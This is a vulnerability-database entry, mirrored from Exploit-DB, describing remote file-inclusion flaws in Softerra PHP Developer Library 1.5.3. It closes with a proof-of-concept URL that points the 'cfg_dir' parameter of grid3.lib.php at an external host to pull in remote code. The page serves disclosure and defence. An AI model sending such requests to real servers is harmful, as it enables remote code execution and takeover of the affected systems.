Softerra PHP Developer Library 1.5.3 - 'Grid3.lib.php' Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055962 漏洞类型
发布时间 2006-10-10 更新时间 2006-10-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/28780
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/20442/info

Softerra PHP Developer Library is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects version 1.5.3; previous versions are affected as well.

http://www.example.com/PHPLibrary-1.5.3/example/lib/grid3.lib.php?cfg_dir=http://www.example.com